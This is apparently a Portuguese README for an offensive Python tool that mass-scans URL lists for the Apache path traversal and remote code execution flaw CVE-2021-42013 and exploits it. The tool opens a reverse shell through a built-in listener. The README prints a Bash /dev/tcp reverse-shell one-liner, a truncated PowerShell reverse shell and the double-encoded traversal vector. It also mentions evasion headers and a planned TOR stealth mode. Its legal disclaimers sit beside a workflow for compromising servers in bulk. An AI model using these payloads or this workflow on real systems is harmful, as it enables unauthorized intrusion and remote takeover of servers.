
Uma ferramenta avançada de varredura, exploração e interação remota projetada para detectar e explorar a vulnerabilidade Apache Path Traversal + RCE (CVE-2021-42013) em servidores mal configurados.
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli
> 💀 Modo Hacker Cósmico Multidimensional ativado...
Uma ferramenta avançada de escaneamento, exploração e interação remota projetada para detectar e explorar a vulnerabilidade **Apache Path Traversal + RCE (CVE-2021-42013)** em servidores mal configurados.
---
## ⚠️ Aviso Legal
> Este software é fornecido apenas para fins educacionais e de pesquisa em ambientes controlados.
O uso desta ferramenta contra sistemas sem autorização expressa pode ser ilegal e constituir crime em muitos países.
O autor não se responsabiliza pelo uso indevido deste código. Use-o por sua conta e risco e sempre com permissão explícita do proprietário do sistema alvo.
---
🧠 Descrição Técnica
Esta ferramenta permite:
- ✅ Escanear múltiplos alvos a partir de um arquivo `.txt`.
- ✅ Detectar automaticamente a presença do CVE-2021-42013.
- ✅ Identificar o sistema operacional remoto (Linux ou Windows).
- ✅ Enviar payloads personalizados de acordo com o sistema detectado.
- ✅ Estabelecer uma reverse shell e obter acesso remoto.
- ✅ Interagir com a shell em tempo real por meio de um listener integrado.
- ✅ Aproveitar logs avançados, barra de progresso e menu interativo.
---
## 🔧 Requisitos
- Python **3.8+**
- Sistemas baseados em Unix/Linux/MacOS (uso de `subprocess` e `curl`)
- Requer as seguintes bibliotecas Python:
```bash
pip install -r requirements.txt
```
**`requirements.txt`**
```
rich
alive-progress
```
Você também precisa ter o `curl` instalado no sistema operacional.
---
## 📁 Estrutura de Arquivos
```
.
├── POC-CVE.py # Script principal
├── logs.txt # Archivo de logs generado automáticamente
├── requirements.txt # Dependencias Python
└── targets.txt # (Opcional) Lista de URLs a escanear
```
---
## 🚀 Uso Interativo
```bash
python3 POC-CVE.py
```
Selecione entre:
* `scan_file`: Escaneia múltiplas URLs a partir de um arquivo e mostra quais são vulneráveis.
* `exploit`: Exploração direta de um único alvo, com shell reversa.
* `exit`: Sair do modo interativo.
---
## 🔍 Escaneamento em Massa (scan\_file)
1. Crie um arquivo com uma lista de URLs, uma por linha:
```txt
http://example.com
http://victim.net
http://192.168.1.100
```
2. Inicie o escaneamento:
```bash
python3 POC-CVE.py
```
Escolha `scan_file` e forneça:
* O caminho do arquivo
* A quantidade de threads para escaneamento paralelo
---
## 💥 Exploração (exploit)
1. Escolha `exploit` no menu.
2. Informe:
* A URL do alvo
* Seu IP local (`LHOST`) para receber a shell
* Uma porta livre (`LPORT`) para o listener
O script:
* Detectará se o alvo é vulnerável.
* Enviará um payload adequado de acordo com o sistema operacional remoto.
* Abrirá um **listener** e fornecerá acesso interativo.
---
## 🧪 Exemplo de Payloads
### Linux Payload (Bash TCP Reverse Shell)
```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```
### Windows Payload (PowerShell TCP Reverse Shell)
```powershell
powershell -NoP -NonI -W Hidden -Command ...
```
---
## 🧠 Técnicas Utilizadas
* Path traversal com codificação dupla (`/.%252e/.%252e/.%252e`)
* Injeção de comandos via `curl`
* Cabeçalhos de evasão (`User-Agent`, `Accept`, etc)
* Shell reversa para assumir o controle remoto
* Multithreading e barra de progresso (Alive Progress)
* Logging com timestamps e Rich Console
---
## 📌 Referência do CVE
* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Vetor de ataque**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Impacto**: RCE (Execução Remota de Código)
* **Pontuação CVSS**: 9.8 (Crítico)
---
## 🧙♂️ Autor
* ✨ **Makaveli** — *"Hackeie sua própria realidade"*
---
## 🛡️ Disclaimer
> Este projeto é fornecido "como está", sem garantias nem responsabilidade por danos decorrentes do seu uso.
> **Nunca escaneie nem explore um sistema sem o consentimento explícito do seu proprietário.**
---
## ✅ Boas Práticas
* Use este script apenas em **ambientes de laboratório** ou testes autorizados.
* Certifique-se de que a porta definida para o listener esteja **aberta** e **sem firewall**.
* Execute como usuário normal (não root), a menos que seja estritamente necessário.
---
## 🧩 Roadmap Futuro (Opcional)
* [ ] Suporte para payloads personalizados
* [ ] Exportação de resultados para CSV/JSON
* [ ] Modo stealth com rotação de headers e proxy TOR
* [ ] Interface web local (Flask)